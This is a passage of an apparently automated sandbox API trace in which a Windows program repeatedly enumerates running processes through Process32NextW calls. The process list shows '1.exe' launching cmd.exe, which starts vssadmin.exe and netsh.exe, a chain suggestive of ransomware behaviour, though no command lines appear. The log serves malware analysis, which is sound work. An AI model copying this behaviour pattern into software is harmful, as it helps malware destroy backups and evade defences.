pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.609] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.610] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.610] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.611] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.612] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.612] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.613] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.614] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0063.614] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.615] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.616] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0063.616] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0063.617] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0063.618] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0063.619] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0063.619] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0063.620] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0063.621] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0063.621] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0063.622] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0063.623] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0063.623] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0063.624] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0063.625] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0063.626] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0063.626] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0064.043] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0064.043] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0064.044] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0064.045] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0064.045] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0064.046] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0064.047] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0064.047] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0064.048] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0064.049] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0064.050] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0064.051] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0064.051] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0064.052] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0064.053] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0064.053] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0064.054] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0064.055] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0064.056] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0064.057] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0064.057] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0064.058] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0064.059] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0064.060] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0064.061] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0064.062] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0064.063] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0064.063] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0064.064] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0064.065] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0064.066] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.067] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0064.068] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0064.069] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0064.069] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0064.070] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0064.071] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0064.072] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0064.072] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0064.073] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.074] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0064.075] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0064.075] CloseHandle (hObject=0x344) returned 1 [0064.075] Sleep (dwMilliseconds=0x1f4) [0064.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x344 [0064.829] Process32FirstW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.831] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0064.832] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0064.832] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0064.833] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0064.834] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0064.834] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0064.835] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0064.836] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0064.836] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.837] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0064.838] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0064.838] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.839] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0064.840] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, 